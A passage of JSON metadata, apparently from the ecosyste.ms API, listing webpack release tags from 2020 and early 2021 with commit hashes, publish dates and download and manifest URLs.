api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.m